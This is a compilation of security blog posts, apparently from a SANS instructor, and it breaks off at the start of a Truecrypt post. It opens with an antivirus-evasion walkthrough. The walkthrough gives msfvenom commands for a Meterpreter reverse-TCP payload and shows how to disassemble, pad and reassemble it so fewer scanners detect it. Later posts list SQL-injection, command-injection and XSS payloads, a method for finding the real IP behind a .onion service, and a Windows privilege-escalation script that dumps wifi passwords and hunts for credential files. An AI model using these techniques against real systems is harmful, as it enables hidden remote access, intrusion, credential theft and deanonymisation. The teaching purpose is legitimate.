Ghostwriting for Antivirus Evasion in 2018

One of the techniques we cover in the antivirus evasion section of the SANS SEC504 course is ghostwriting. The topic was covered brilliantly by Royce Davis on his blog back in 2012.

The workflow he laid out still works, but some of the specific commands have changed slightly in Kali Linux. One of my students asked if I knew of a resource with the updated commands and I didn't, so I decided to write one.

The technique takes advantage of the fact that antivirus programs sometimes flag an executable as malicious not because of the program's functionality, but because it contains signatures indicating it was created with a "malicious" tool such as Metasploit. If this is the case with our payload, then maybe we can make minor modifications which don't affect the payload's functionality, but which "break up" or otherwise alter the signatures that are getting it flagged as malware.

Note: For the commands and screenshots shown below I used Kali Linux 2017.2

Step 1: Payload creation

Msfpayload has been deprecated in favor of msfvenom, so that's what we'll use to generate our payloads. As a baseline, I'll use msfvenom to make an .exe file and see how it does on VirusTotal.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe > straight.exe

The executable produced worked like a champ:

And as expected, when we submit it to VirusTotal, 51 of 67 engines flag it as malicious.

With the baseline out of the way, we can get down to business. First we use msfvenom to generate a raw binary instead of an .exe file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > raw_binary

Step 2: Disassemble binary

We then make disassemble.rb executable by running:

chmod +x /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasm-1.0.3/samples/disassemble.rb

We use disassemble.rb to convert our raw binary file to assembly.

/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasm-1.0.3/samples/disassemble.rb raw_binary > asm_code.asm

Step 3a: Modify our assembly

Now that we have an assembly file, we need to make a slight modification so that we can assemble it into a working .exe file later. We can use a text editor like Leafpad to add the following line to the top of the file.

.section '.text' rwx

At this point that's the only modification I'm going to make to the assembly file, to demonstrate a point.

Step 4: Build the assembly file into an .exe file

We run the following command to make peencode.rb executable.

chmod +x /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasm-1.0.3/samples/peencode.rb

We then use peencode.rb to build our assembly file into an .exe windows executable file.

/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasm-1.0.3/samples/peencode.rb asm_code.asm -o payload.exe

I copied the file to a Windows system to test if the payload worked (it did) and then submitted it to VirusTotal.

As you can see, while a majority of the antivirus engines VirusTotal uses still catch this payload, we have gone from 51 detections to 38 just by assembling the .exe file ourselves instead of letting msfvenom generate it. Even that slight change from the normal workflow resulted in over 25% fewer detections. And we haven't even started ghostwriting yet!

Step 3b: Ghostwriting

Now that we have that process down, let’s go back to step three and tweak our assembly a bit.

Our goal is to make a change that doesn’t affect the functionality of the program in any way, but still modifies the syntax or structure. One way to accomplish this is to look for any place in the code where a register is XOR’ed with itself.

When a register is XOR'ed with itself, its value becomes zero. If we know that a register is about to be zeroed out, does it matter what its value is right before that? Nope!
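A quick Python sanity check of that claim (the values below are arbitrary):

```python
# XOR-ing any value with itself always yields zero, which is why
# `xor edi, edi` is such a common way to zero out a register --
# the register's prior contents never matter.
for value in (0, 1, 0x41414141, 0xFFFFFFFF):
    assert value ^ value == 0
print("xor reg, reg always zeroes the register")
```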

In the screenshot below, we identify the EDI register being XOR'ed with itself. Right before that we insert the following two instructions:

push edi
pop edi

These instructions push the value of the EDI register onto the stack, and then pop it off the stack right back into EDI. Zero change to the functionality, but now a slightly different signature.

With that change in place, we can build the .exe file from the modified assembly, confirm it works (it does) and upload it to virustotal.

At the risk of sounding like a web banner ad, we just got a 10% reduction in detections from this one small change!! 🙂

The better we understand assembly and the more time we're willing to spend, the more we can improve these detection figures. In his blog post, Royce cites Vivek Ramachandran as the recommended place to learn assembly, and I couldn't agree more. Vivek has a free series of videos available online as well as some low-cost series.

If you want to start working on antivirus evasion, this is a great place to begin. It can also be a fun project to use for learning assembly.

Incorporating Facial Recognition into Your OSINT

Between multiple accounts, nicknames and fake names, an individual performing OSINT will often find themselves looking at two pictures and wondering, “Is this the same person?” Sometimes it’s obvious that it is or isn’t the same individual, but it’s not always easy. When uncertainty is high, it would be fantastic to have an unbiased algorithm examine the faces and give a similarity score. I set off to see if I could configure a generic “black box” solution that I could point at a directory of images, and have it tell me which ones were of the same individual.

The first thing I needed to find was a robust facial recognition solution. I found OpenFace, an open source facial recognition engine developed at Carnegie Mellon. It's Python based, uses several external libraries to detect the face and adjust it for comparison, and utilizes deep neural networks for analysis. That's worth 10 points in buzzword bingo!!
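Under the hood, OpenFace maps each face to a 128-dimensional embedding and scores similarity as the squared L2 distance between embeddings (lower means more likely the same person). A rough sketch of that final comparison step, using made-up embeddings:

```python
# Squared L2 distance between two face embeddings. The 128-dim
# vectors below are fabricated for illustration -- real ones come
# from OpenFace's neural network.

def squared_l2(a, b):
    return sum((x - y) ** 2 for x, y in zip(a, b))

face_a = [0.1] * 128
face_b = [0.1] * 128  # identical embedding
face_c = [0.2] * 128

print(squared_l2(face_a, face_b))  # 0.0 -- identical images score 0
print(squared_l2(face_a, face_c))
```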

Since there are so many dependencies involved, the OpenFace developers strongly recommend utilizing the Docker image that they created. That fit perfectly with the modular black box end goal I was after, so that's exactly what I did. I downloaded the latest community edition of Docker for Windows and installed it on a laptop I utilize for OSINT. Make sure you run the installer as admin; after a logoff and a restart, you should be good to go. You can verify this by opening up an administrative command prompt and typing "docker version".

I then pulled down the OpenFace image with a docker pull bamos/openface command. Once I had that in place, I made a "docker" directory on my c:\ drive and made three subdirectories underneath it: group1, group2 and output.

I then modified the Docker settings to share the c:\ drive with Docker images. With those in place, it was then time to make a few modifications to the Docker image. First, I made some slight changes to the /root/openface/demos/ file. The mods accomplished two things.

  1. Added in a bit of error handling (unmodified it would error and exit if it couldn’t find a face in a picture).
  2. Made the text output easier to parse.

I also added a one line .sh file at /root/ which had OpenFace compare pictures in the c:\docker\group1 and c:\docker\group2 directories and output the results to the c:\docker\output directory.

You can either make those same modifications and then commit your changes, or download a copy of my modified version. If you download my modified version, you can unzip it to a directory and then run docker load -i openfacemod1_v122117.

Now that we have our modular black box in place, we can test it with a simple Python script that compares the images in the group folders and generates an HTML report. NOTE: The compare script requires there to be at least one image in the group2 directory to function properly. I put a picture of Trump in my group2 directory and all the pictures I wanted analyzed in group1. If you modify the compare script to only use group1, the output will be unnecessarily long, as it will compare images against themselves as well as the other images.
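To give a feel for the reporting side, here is a hedged sketch. It assumes the modified compare demo writes one "image1 image2 score" line per comparison; that log format is my modification's, not stock OpenFace output:

```python
# Parse comparison results and build a minimal HTML report for any
# pair scoring below 1.0 (identical photos score 0). The log line
# format is an assumption based on my modified compare script.

def matches(log_lines, threshold=1.0):
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) != 3:
            continue  # skip error / "no face found" lines
        img1, img2, score = parts[0], parts[1], float(parts[2])
        if score < threshold:
            hits.append((img1, img2, score))
    return hits

def html_report(hits):
    rows = "".join(
        '<tr><td><img src="%s"></td><td><img src="%s"></td><td>%.2f</td></tr>' % hit
        for hit in hits
    )
    return "<html><body><table>%s</table></body></html>" % rows

log = ["a.jpg trump.jpg 1.63", "b.jpg trump.jpg 0.42"]
print(html_report(matches(log)))
```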

The Python script can be viewed here.

The final step is to create a two line batch file that has the docker image analyze the photos, then runs our python script on the results.    

The end result is the raw log.txt files with all the results in the output directory, and an HTML report in the docker directory with all photos which scored below 1.0 (identical photos will score 0). I used world famous hacker/social engineer/model Chris Hadnagy for my tests.

While this is a very simplistic example of how we can use facial recognition to help us with our OSINT efforts, the modular nature of the modified docker image gives us the ability to easily incorporate this capability into our web crawlers and scrapers looking for matches.

Using Burp Suite’s Collaborator to Find the True IP Address for a .Onion Hidden Service

On this Thanksgiving day I’m going to write about something near and dear to all our hearts: stuffing. I’m not talking about the delicious pile of bread you’ll have on your plate this afternoon, I’m talking about stuffing payloads into websites to look for vulnerabilities.

We stuff things into web sites all the time. We stuff ' or 1=1; -- and hope for SQL injection, we stuff ; cat /etc/passwd and hope for command injection, we stuff alert("BEEP!!!") and hope for cross site scripting, and we stuff our credit card number in and hope that this is an authentic Tribble from the 1967 Star Trek episode.

Sometimes we receive instant feedback on our payloads and can confirm a vulnerability in seconds. If I put in ' or 1=1; -- and bypass a login screen, I can break out my SQL injection dance then and there. The problem comes when you're injecting your payload somewhere with a delayed response. What if the payload I fire at a website right now doesn't get executed until an admin is looking at the logs Monday morning? If we want to be able to detect the payload working, we need to set up persistent infrastructure to listen 24 hours a day.

Burp Suite made this MUCH easier when they launched “Burp Collaborator” in 2015. Collaborator, which is included with Burp Suite Professional at no additional cost, is a server set up to listen 24 hours a day, 365 days a year for your payloads to fire back to it.

In the screenshot above, I can click “copy to clipboard” and generate a unique URL that I can utilize in any payload I want.

If anyone or anything looks the URL up or visits it, I will get a notification back in my Burp Suite collaborator client.

This is amazing and unbelievably powerful. We now have the infrastructure in place to generate payloads and listen for them no matter how long of a delay we’re dealing with. As the official Burp Suite twitter feed said earlier this week, if you’re not doing Out-of-band Application Security Testing (OAST), you’re doing it wrong.

Ok, now that we’re all excited about this and see how easy it is, where do you think we should stuff our new payloads? If you excitedly said “EVERYWHERE!!!!”, I like your style and agree with you!!! Fortunately, a brilliant guy named James Kettle agreed with you too and wrote a Burp Suite Professional plugin called “Collaborator Everywhere” earlier this year. The author wrote a fantastic blog post called “Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface” where he introduced the world to his plugin. My friend Kat sent me a link to it during Blackhat and I sat at an outdoor bar in Las Vegas and read it on my phone from start to finish. I’m that much of a nerd and it was that good.

Collaborator Everywhere wants to help us identify back end systems and processes by automatically injecting these collaborator payloads into our web surfing done through Burp Suite. What does it actually do? Check out some of these headers it automatically inserted when I just visited my blog.
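Conceptually, the plugin seeds each outbound request with unique Collaborator subdomains in headers that back end systems often process. A simplified illustration; the domain is a placeholder and the header list is a small subset of what the plugin actually injects:

```python
# Seed a request's headers with Collaborator payloads. The domain
# below is a placeholder -- Burp generates a unique subdomain per
# payload so a pingback can be traced to a specific injection.

PAYLOAD_DOMAIN = "x7f3q.burpcollaborator.example"

def inject_collaborator_headers(headers):
    headers = dict(headers)  # don't mutate the caller's dict
    headers["Referer"] = "http://%s/" % PAYLOAD_DOMAIN
    headers["X-Forwarded-For"] = PAYLOAD_DOMAIN
    headers["True-Client-IP"] = PAYLOAD_DOMAIN
    return headers

for name, value in sorted(inject_collaborator_headers({"User-Agent": "Mozilla/5.0"}).items()):
    print("%s: %s" % (name, value))
```

If anything downstream resolves or fetches one of those values, the Collaborator server records the interaction.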

Visiting a particular site with the plugin enabled, I got a DNS lookup from one of my payload injections:

James did a Black Hat talk you can watch here, where he covers all of the great work he's done using these techniques. While I was watching the talk, I thought that this technique could potentially be utilized to identify the true IP address of a TOR .onion hidden service.

I fired up my TOR browser bundle and configured Burp Suite to go through TOR. I then surfed to multiple .onion hidden services to see if any of them would give me a collaborator pingback. Finally on about the twentieth site I visited, it worked 🙂

I now had the true IP address for a server associated to an .onion hidden service due to it looking up a header it was fed.

I encourage you to use these techniques on websites which you own or legally have permission to test. They’re easy to use, fun and extremely effective.


11/24/2017 Update:

The tweet I sent out announcing this got quite popular and led to a great sidebar conversation among several people. One of the key points of the thread was that this pingback comes from the DNS resolver, which may be located very close to the host server, but not necessarily so. That thought was in my head, which is why I used the phrase "associated to" instead of "hosting", but it absolutely warrants increased clarity.

Feedback like this is part of what makes the infosec community the amazing place that it is 🙂 My goal was never to publicly out anyone's .onion service, which is why I sanitized all my screenshots, but in this case, based on the site's content, the resolver IP address was in line with what I would expect for a hosting location and I believe it was very close to the host server.

Resources to Help Identify Password Hash Formats

One question that I get asked a lot when I’m teaching the password cracking section in the SANS SEC504 class is “Once I get a password hash, how do I figure out what type of hash it is?” I mention a few resources in class but thought it would be worthwhile to put together a quick write-up to help past and future students after the class.

The first thing I always mention is that you will likely know exactly what type of hash it is based on how you acquired it. If you use Meterpreter to dump hashes from a Windows system, grab the hashes from an /etc/shadow file or capture a hash using Responder, you know exactly what type of hash it is based on the method you used to capture it. The same is true if you obtained the hash from an encrypted file, as I discussed in this blog post on the SANS pen test blog.

With that out of the way, let’s talk about what to do when you’re not sure what type of hash it is.

Option 1: Have a program identify the hash for you

Some password cracking programs, like John the Ripper, will try to identify the hashes you ask them to crack, but they're not always right.

Another option, called HashTag, is available here. HashTag is a Python program that can look at a single hash or a text file full of hashes and attempt to identify them for you. It will generate a list of the hashes it found and what it thinks they could be.

It appears to detect 269 different hash formats and even includes a handy Excel spreadsheet of those formats, complete with examples.
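The core idea behind tools like HashTag is simple: match the hash's length, character set and any signature prefix against known formats. A stripped-down sketch of that idea; a real identifier covers hundreds of formats, and ambiguity (e.g. MD5 vs NTLM) is unavoidable from the hash alone:

```python
import re

# Guess candidate hash formats from length, charset and prefixes.
# Only a handful of formats are covered, purely to show the idea.

def guess_hash(h):
    candidates = []
    if re.fullmatch(r"[0-9a-fA-F]{32}", h):
        candidates += ["MD5", "NTLM", "LM"]
    if re.fullmatch(r"[0-9a-fA-F]{40}", h):
        candidates.append("SHA-1")
    if re.fullmatch(r"[0-9a-fA-F]{64}", h):
        candidates.append("SHA-256")
    if h.startswith("$1$"):
        candidates.append("md5crypt")
    if h.startswith("$6$"):
        candidates.append("sha512crypt (/etc/shadow)")
    return candidates or ["unknown"]

print(guess_hash("8846f7eaee8fb117ad06bdd830b7586c"))  # ['MD5', 'NTLM', 'LM']
```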

Option 2: Check the Wiki that Hashcat maintains for examples

When you're trying to figure out what a hash is, it's always important to ask yourself what seems likely. If the hashes come from a SQL injection attack against a custom web app running on an Apache server, LanMan hashes seem highly unlikely. In that scenario, options like MD5 would be much more likely.

If you have an idea of what the hash might be, Hashcat maintains a fantastic wiki of example password hashes for different formats at:

Option 3: Ask for help

Hashcat maintains a fairly active forum. You ARE NOT allowed to post hashes in the forum (doing so is grounds for getting banned), but if you sanitize the hash you can post it, provide what details you can about the source, and ask if anyone has advice on what it is and how to deal with it. I've seen veterans go the extra mile on edge cases where things like a custom salt encoding were used.


As I stated in the beginning, we usually have a really good idea of what the format of a hash is. If the hashes come from a custom web app or some other obscure source, we now have a few resources we can check so that we can correctly identify them, and more importantly, start cracking them 🙂


Persistent Monitoring on a Budget

I am a huge fan of Justin Seitz and his blog. Last holiday season he let me know that Pastebin was having a sale on its API access, and that he was planning on using it in a future project. He came out with that project in April, with a post where he used Python, the Pastebin API and a self hosted search engine called searx to make a persistent keyword monitor which shot out an alert email anytime it found a "hit".

I was a huge fan of his post and made some modifications to his code in order to fit my needs. I'm much more of a hacker than a coder, so I'm sure there are more elegant ways to achieve what I did, but it's been meeting my needs for several months and has had multiple relevant finds. I was recently asked for a copy of my modifications, so I thought it easiest to post them on GitHub and write up a description here.

Mod 1: Dealing with spaces in search terms.

Early on I noticed that I would have fantastic results when looking for email addresses hitting Pastebin and other sites, but was getting quite a few false positives on names. I tested searx and it appeared to respect quotes in searches just like Google, i.e. searching Matt Edmondson will return pages that contain both "Matt" and "Edmondson", regardless of whether they are together, while searching for "Matt Edmondson" forces them to be adjacent. I made a minor modification to the code in the searx section to check each search term for spaces. If the term contains spaces, it places quotes around the term before searching it in searx. This modification did indeed help reduce false positives on multi-word search terms.
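The quoting tweak itself boils down to a few lines. This is a paraphrase of what my modification does, not Justin's original code:

```python
# Wrap multi-word search terms in quotes so searx requires the
# words to be adjacent instead of merely co-occurring on the page.

def prepare_term(term):
    if " " in term and not term.startswith('"'):
        return '"%s"' % term
    return term

for term in ("matt@example.com", "Matt Edmondson"):
    print(prepare_term(term))
```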

Mod 2: URLs I don’t care about

While my false positives were now lower, I was still getting results from sites that were valid hits, but that I didn't care about. I realized that for a lot of these sites, I would likely never care about any hits on them, so I made a text file list of "noise URLs". Anytime searx found a new hit, I had it check to see if the URL contained anything from my noise URL list. If it didn't, it proceeded as normal.
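The filtering logic is a simple substring check. The noise entries below are hypothetical placeholders; in practice the list is loaded from the text file:

```python
# Skip hits whose URL contains an entry from the noise list.
NOISE_URLS = ["people-search.example.com", "mirror.example.net"]  # placeholders

def is_noise(url, noise=NOISE_URLS):
    return any(entry in url for entry in noise)

for url in ("https://pastebin.com/abc123",
            "https://people-search.example.com/matt"):
    if is_noise(url):
        print("[+] Fake News! " + url)   # written to the fake news file
    else:
        print("[*] New hit: " + url)     # proceeds to the email alert
```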

If however the searx find was in my noise URL file, the program would print “[+] Fake News!” to the screen and silently write the URL to a fake news text file instead of notifying me via email. This enabled me to reduce my noise while still having a place to go early on and see if I was ignoring anything that I shouldn’t be.

Mod 3: A picture is worth a thousand key words

Now that I was more satisfied with my signal/noise ratio, I decided to make the triage of notification emails more efficient by not just sending me the links to pages that contained my terms, but actually send me a picture of the page as well. This was easy to do, but did come at a cost.

I used PhantomJS to accomplish this task. Whenever the program found a hit in searx or on Pastebin, the code would open up a PhantomJS browser, visit the URL, take a screenshot, and save it to a directory so that it could later be attached to my notification emails.

This provided a huge increase in my triaging speed since I didn’t necessarily have to visit the site, just look at a picture. It was also nice a few times when the sites causing my alerts were 3rd party sites which had been hacked and contained malware.

One negative was the increase in system requirements, since PhantomJS needs quite a bit more RAM than a normal Python script does. If you have this running on a physical system that you control, this is likely a non-issue since the specs needed are still modest. If you're using a provider like Digital Ocean, however, I found that I needed to go from the $5 a month box to the $20 a month box before I achieved the "running for weeks unattended" stability that I desired.

Mod 4: Email Tweaks

The first tweak I made to the email section was an unbelievably minor one to allow for alerts to be sent to multiple email addresses instead of just one. I then had to modify the format of the email slightly to go from a plain text message, to a message with attachments.

As you can see in the code above, I have the send email function attach anything in the ./images subfolder (up to five items) and then delete everything in the folder so it’s clean for the next alert. The reason I limited it to five attachments was that it’s possible to get an email with a dozen or more alerts and if the pages are large, the screenshots will be large as well.

Trying to process a large number of sizeable attachments can cause the program to hang and affect my precious stability. Capping the number of attachments at five seemed like a good compromise, since it allows me to get screenshots 99% of the time, with the occasional need to actually go click on a link like a barbarian 🙂
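A hedged sketch of that attachment logic; the ./images directory is from the post, but the function shape is mine:

```python
import os

# Grab at most five screenshots for the alert email, read their
# bytes, then empty the folder so the next alert starts clean.

def collect_attachments(image_dir="./images", limit=5):
    names = sorted(os.listdir(image_dir))
    payloads = {}
    for name in names[:limit]:
        path = os.path.join(image_dir, name)
        with open(path, "rb") as f:
            payloads[name] = f.read()
    for name in names:  # delete everything, attached or not
        os.remove(os.path.join(image_dir, name))
    return payloads
```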

The next time I make mods to this, I’ll likely move all of the images to a cold storage directory which I’ll delete every week with a cron job. That way in those 1% cases where I lack a screenshot, I’ll still have one in the cold storage folder.

Once again, a HUGE hat tip to Justin Seitz. This would absolutely not exist in this form without him. I didn't even know searx was a thing until he introduced me to it.

A Script to Help Automate Windows Enumeration for Privilege Escalation

Often when I want to learn a skill, I’ll think up a project for myself that forces me to improve that skill. Recently I wanted to improve my Windows post exploitation and privilege escalation so I decided to work on a script to enumerate Windows systems to look for low hanging fruit that can be used to escalate privileges.

A good deal of my commands come from the definitive guide to Windows privilege escalation and the resources mentioned in that post. If you're working on your Windows privilege escalation, you really should spend some time on that page.

I decided to use a batch file instead of PowerShell since batch should run anywhere and is easy for others to understand and modify. The output of the script is saved to three different text files. The script will be a work in progress, but I wanted to post a copy to try to help others automate the process.

First the script gathers basic enumeration information such as:

  • Hostname
  • Whoami
  • Username
  • net user info
  • systeminfo
  • mounted drives
  • path
  • tasklist /SVC

The script checks to see if .msi files are set to always install with elevated privileges, as well as for the presence of backup copies of the SAM for those juicy, juicy password hashes.

If accesschk.exe from sysinternals is present, the script uses it to check for services that can be modified by unprivileged users.

After a quick check for sysprep files which may contain creds, network information is gathered including

  • Ipconfig /all
  • Net use
  • Net share
  • Arp –a
  • Route print
  • Netstat –nao
  • Netsh firewall show state
  • Netsh firewall show config
  • Netsh wlan export profile key=clear (shows wifi networks and passwords that the system has connected to previously)

No privilege escalation script would be complete without looking at scheduled tasks, so we run

  • Schtasks /query /fo LIST /v
  • Net start
  • driverquery

The script checks for any mention of "password" in the registry and then changes directories to c:\, since it is getting ready to search the entire file system for files which may have credentials in them.

The results of the scans so far are saved to output.txt and a c:\temp directory is created for output of the next two text files of information.

The script checks for any file that contains “pass”, “cred”, “vnc” or “.config” in the file name. It then checks for a large number of .xml configuration files which may have creds including unattended install files.
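For the curious, the filename sweep amounts to this; a rough Python equivalent of the batch script's search step, with the keyword list taken from the post:

```python
import os

# Walk a directory tree and flag files whose names contain
# credential-ish keywords -- a Python rendering of the batch
# script's filename search.

KEYWORDS = ("pass", "cred", "vnc", ".config")

def interesting_files(root):
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if any(k in name.lower() for k in KEYWORDS):
                hits.append(os.path.join(dirpath, name))
    return hits
```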

The final file that the script creates is a tree list of all the files on the c:\ drive, and the script ends by outputting to the screen any service paths which aren't properly quoted and may be exploitable.
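That unquoted service path check is worth understanding: if a service binary lives at something like C:\Program Files\Foo Service\svc.exe without surrounding quotes, Windows will try C:\Program.exe first, which an attacker may be able to plant. A simplified detector over wmic-style path strings; the parsing rules are an approximation, not the script's exact logic:

```python
# Flag service image paths that contain spaces but aren't quoted.
# Paths under C:\Windows are skipped, mirroring the usual heuristic.

def unquoted_services(path_lines):
    vulnerable = []
    for line in path_lines:
        path = line.strip()
        if not path or path.startswith('"'):
            continue  # quoted paths are fine
        lower = path.lower()
        exe = lower.split(".exe")[0] + ".exe" if ".exe" in lower else lower
        if " " in exe and not exe.startswith("c:\\windows"):
            vulnerable.append(path)
    return vulnerable

paths = [
    '"C:\\Program Files\\Good Service\\svc.exe" -k run',
    'C:\\Program Files\\Bad Service\\svc.exe',
    'C:\\Windows\\system32\\svchost.exe -k netsvcs',
]
print(unquoted_services(paths))  # only the Bad Service path is flagged
```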

I recently had a chance to run this script and it GREATLY sped up the process of looking for low hanging fruit on a Windows system and helped me spot a password in the registry.

As I make modifications to the script I’ll post the updates here but you can download a copy of the script at:

Python Script to Map Cell Tower Locations from an Android Device Report in Cellebrite

Recently Ed Michael showed me that Cellebrite now parses cell tower locations from several models of Android phones. He said that this information has been useful a few times but manually finding and mapping the cell tower locations by hand has been a pain in the butt. I figured that it should be easy enough to automate and Anaximander was born.

Anaximander consists of two python 2.7 scripts. One you only need to run once to dump the cell tower location information into a SQLite database and the second script you run each time to generate a Google Earth KML file with all of the cell tower locations on it. As an added bonus, the KML file also respects the timestamps in the file so modern versions of Google Earth will have a time slider bar across the top to let you create animated movies or only view results between a specific start and end time.

Step one is to acquire the cell tower location data. For this we sign up for a free API key. Once we get the key (instantly) we can download the latest repository of cell phone towers.


Currently the tower data is around 2.2 GB and contained in a CSV file. Once that file downloads, you can unzip it to a directory and run the script from Anaximander. The short and simple script creates a SQLite database named "cellTowers.sqlite" and inserts all of the records into that database. The process should take 3-4 minutes and the resulting database will be around 2.6 GB.
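The import boils down to something like this. The column names follow the OpenCelliD CSV layout as I understand it (radio, mcc, net, area, cell, lon, lat, ...), so treat them as assumptions and verify against the header row of your download:

```python
import csv
import sqlite3

# Load the tower CSV into a SQLite database. Column names are
# assumptions based on the export's header row -- double check them.

def import_towers(csv_path, db_path="cellTowers.sqlite"):
    conn = sqlite3.connect(db_path)
    conn.execute(
        "CREATE TABLE IF NOT EXISTS towers ("
        "radio TEXT, mcc INTEGER, net INTEGER, area INTEGER, "
        "cell INTEGER, lon REAL, lat REAL)"
    )
    with open(csv_path) as f:
        rows = (
            (r["radio"], r["mcc"], r["net"], r["area"], r["cell"], r["lon"], r["lat"])
            for r in csv.DictReader(f)
        )
        conn.executemany("INSERT INTO towers VALUES (?, ?, ?, ?, ?, ?, ?)", rows)
    conn.commit()
    return conn
```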

Once the database is populated, the next time you dump an Android device with Cellebrite and it extracts the cell towers from the phone, you’ll be ready to generate a map.

From the "Cell Towers" section of your Cellebrite results, export the results as XML. Place that XML file and the script in the same directory as your cellTowers.sqlite database and then run it with -t <YourCellebriteExport.xml>. The script will start parsing through the XML file to extract cell towers and query the SQLite database for the location of each tower. Due to the size of the database, the queries can take a second or two each, so the script can take a while to run if the report contains a large number of towers.
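Each of those per-tower lookups is essentially the query below; the table and column names are assumptions about the database schema, with a tower keyed by MCC, MNC, LAC and Cell ID:

```python
import sqlite3

# Look up a tower's coordinates by its identifiers. Returns
# (lat, lon), or None if the tower isn't in the OpenCelliD dump.

def tower_location(conn, mcc, net, area, cell):
    return conn.execute(
        "SELECT lat, lon FROM towers "
        "WHERE mcc=? AND net=? AND area=? AND cell=?",
        (mcc, net, area, cell),
    ).fetchone()
```

Since each query hits a multi-gigabyte table, adding an index on (mcc, net, area, cell) would speed the per-tower lookups up considerably.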


Ed was kind enough to provide two reports from different Android devices and both parsed with no issues. Once the script is finished it will let you know how many records it parsed and that it generated a KML file.


This is what the end results look like.


The script can be downloaded from:

This is the first version and there are several improvements to make but I wanted to get a working script out to the community to alleviate the need for examiners to map the towers one at a time. Special thanks again to Ed Michael for the idea for this (and one other) script as well as for providing test data to validate the script.

How to Guide for Getting Kali Linux Set Up on an AWS Instance

I’ve been using a “jump box” on Digital Ocean for a few years now and recently decided that I wanted to set up a Kali Linux instance on AWS. I ran into a few hiccups getting it up and running, so I documented what worked for me here in the hopes of saving others time and headaches.

One of the first articles I came across was by Primal Security (whose podcast I absolutely LOVE). There was some great stuff in this article. Unfortunately it relied on an AWS Marketplace Kali Linux image, which is no longer available to new customers.

The next article I found was very close to what I needed, with one major exception: the default install for the Debian Jessie instance at the link they provided had a main partition size of only 8GB, which is not enough for a full Kali Linux install. I learned that lesson the hard way when my install failed at the very end.

With a hat tip to the above resources, here are the steps needed to successfully install Kali Linux on AWS.

Go into your AWS console and select, “Launch Instance,” in the upper left hand corner.


Search for and select the Debian Jessie image from the AWS Marketplace.


Here you can select how many vCPUs and RAM you would like. (Admin note: I chose the medium with 2 CPUs and 4 GBs of RAM.) Make sure you hit the, “Next: Configure Instance Details,” so you can add more storage space.

The defaults on most pages should work fine for you, so click Next until you get to the "Step 4: Add Storage" page. On this page, make sure you change the default size from 8 to at least 20 GBs. (Admin note: I went with 30 GBs.) After a full Kali Linux install, the drive will have around 10 GBs on it, so anything over 20 should be good for you.


Once you make that change, you are ready to launch your instance and SSH in. If you’ve never used AWS before, it may take you a few minutes to figure out how to access your box. After the first time, it’s quite easy. Make sure your security groups allow for SSH from your current IP address. The private key you generate should allow you to SSH onto the box – as the user “admin” – using just that key file for authentication.

Click the connect button in your AWS control panel instance window, and you will see some tips on how to access your box, including how to modify the key file for Putty, if you’re a Windows user.

Once you’re logged into the box, run sudo su in order to switch to the root user. Use the passwd command to create a password for root.

Next, add the Kali Linux source repositories. Typing vi /etc/apt/sources.list will let you access the sources.list file where you can then append the following lines onto the end.

deb kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src kali-rolling main contrib non-free

deb sana main non-free contrib
deb sana/updates main contrib non-free
# For source package access, uncomment the following line
# deb-src sana main non-free contrib
# deb-src sana/updates main contrib non-free

deb moto main non-free contrib
# For source package access, uncomment the following line
# deb-src moto main non-free contrib

Admin note: The source for these repositories is the official Kali site.

Once the repositories are in place, run apt-get update && apt-cache search kali-linux to get update information and show all of your Kali Linux install options.

Once that command completes, you will see a list of about ten different flavors of Kali Linux available, including minimal, top ten, and full. Of course, you want the full version (which is what you have in a normal Kali Linux VM), so run apt-get install kali-linux-full. This will likely take a while to run, but once it completes (hopefully without errors) you'll have a working Kali Linux distro in the AWS cloud.

Admin note: There is a very real chance that you could encounter errors in these steps. If this happens, it’s no big deal. Ensure you added the correct lines to the sources.list file and then just rerun the last two apt-get commands. It may take an iteration or two, but it will eventually work and install successfully.

What better way is there to test a newly installed Kali instance than to type msfconsole ?


I tested my new instance's connectivity by grabbing the public facing IP from the AWS control panel, opening up port 80 and hitting it from a web browser. That worked, but was boring. What was quite a bit more fun was firing up a Metasploit listener, putting the IP address into a LAN Turtle from Hak5, sticking that into a computer hooked up to a network, and within a few seconds receiving a shell.


You now have a fully updated machine running Kali Linux sitting on the internet, ready to go anytime you want it, for a total cost of a few dollars a month, as long as you remember to shut it down after you use it!

I can’t wait to collect more shells!

GREM Achievement Unlocked

I had been going through the SANS FOR610 Reverse Engineering Malware content OnDemand recently, and last week I knocked out the GREM. I figured it would be a good time to post a few thoughts on it and cover some things people can do to prepare for the course.

This was the first time in a while that I prepped for a GIAC exam without attending the course live. I was a bit worried about that with such a technical course, but I ended up having a great experience. This was also the first time one of my courses used the new style of OnDemand, where the course was recorded in a professional studio instead of during a live class. The results were really nice and felt more intimate than I expected.

Every time a lab came up, I would pause the course, work through the lab, and then watch Lenny Zeltser's walkthrough afterwards. He did a fantastic job of explaining things and going through the labs step by step. Even when dealing with advanced concepts, I never felt lost.

In a stroke of great timing, when I was about 75% through the course content I got a spear phishing email at work with an attachment. I checked it against and only 4/56 flagged it as malicious, with no further information available. I thought it would be a good chance to put my newly acquired skills to the test and examine the attachment. I fired up my two VMs, and in a short amount of time I had a clear picture of what the malware was doing, had network-based and host-based IOCs, and was walking through the code in a debugger examining how it unpacked itself. It was great practice and a nice confirmation that what I had learned worked in the real world.

In prepping for the exam I spoke to several friends who hold the GREM certification. One of the biggest things someone can do to prepare for the course is to get comfortable with assembly language and with watching and understanding what the stack is doing inside a debugger. The course teaches these things, but if you've already been exposed to them you'll feel a lot more comfortable, and it will allow you to focus on learning the other material.

Different people have different learning styles, but this is one area where I think it's really beneficial to watch someone walk through examples while they explain what's going on. A fantastic free resource for getting exposed to assembly language is Vivek Ramachandran's 11-part “Assembly Language Megaprimer for Linux” video series, which is also available on YouTube. Vivek also has a cheap (but not free) “x86 Assembly Language and Shellcoding on Linux” series, which really helped me prepare for working on both reverse engineering and exploit development.

Overall I thought the FOR610 was a fantastic course and I got exactly what I wanted to get out of it.

How Long Do Truecrypt AES Keys Remain In Memory?

It’s been a bit since my last post and in that time I’ve been to two SANS conferences, Blackhat and Defcon. It’s been a great but busy few months.

